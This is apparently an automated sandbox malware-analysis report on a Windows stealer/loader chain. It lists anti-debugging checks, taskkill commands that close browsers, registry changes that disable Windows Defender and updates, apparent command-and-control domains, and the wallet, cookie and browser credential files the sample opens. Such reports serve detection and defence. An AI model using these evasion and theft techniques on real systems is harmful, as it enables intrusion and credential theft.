driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_00BC2448 Start: 00BC24BB End: 00BC2486 5_2_00BC2448
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Code function: 3_2_05400229 rdtsc 3_2_05400229
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_00A3B970 LdrInitializeThunk, 5_2_00A3B970
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_0101652B mov eax, dword ptr fs:[00000030h] 8_2_0101652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_0101A302 mov eax, dword ptr fs:[00000030h] 8_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: 7RNKVR1EZ552XQ73.exe PID: 5628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 606f2f6db0.exe PID: 8156, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 2d569de7b1.exe, 0000000C.00000000.2915915173.0000000000D62000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2419316485.0000000000C25000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000008.00000002.3336042883.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: -TProgram Manager
Source: 7RNKVR1EZ552XQ73.exe, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320028060.00000000006AB000.00000040.00000001.01000000.00000007.sdmp, 606f2f6db0.exe, 0000000A.00000002.2935241193.00000000004BB000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Y~4Program Manager
Source: firefox.exe, 00000019.00000002.3156333371.0000002E515FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 976d9f40c1.exe, 00000009.00000002.2804424979.0000000001225000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: !Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FFD3E2 cpuid 8_2_00FFD3E2
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000979001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000979001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FFCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 8_2_00FFCBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FE65E0 LookupAccountNameA, 8_2_00FE65E0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: file.exe, 00000000.00000003.2167234333.0000000005A40000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 8.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.S14AV77TIR9DRWSCWIW0.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2321093178.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2361822309.0000000000FE1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2646773633.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3335074148.0000000000FE1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2342431976.0000000000DE1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2254811095.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3341551842.0000000001388000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2d569de7b1.exe PID: 7448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 5328, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 35.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.7RNKVR1EZ552XQ73.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000000.2977404002.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2884674962.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319704443.00000000002D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3145991383.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.3221111651.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3155884712.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3081987586.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3235939586.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2279367623.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2934932135.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2993490502.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2992177721.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3237002232.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7RNKVR1EZ552XQ73.exe PID: 5628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 606f2f6db0.exe PID: 8156, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ,"p":"%appdata%\\Electrum\\wallets",
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %\\com.liberty.jaxx\\Ind
Source: file.exe, 00000000.00000003.2147845498.00000000010D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletH
Source: file.exe String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
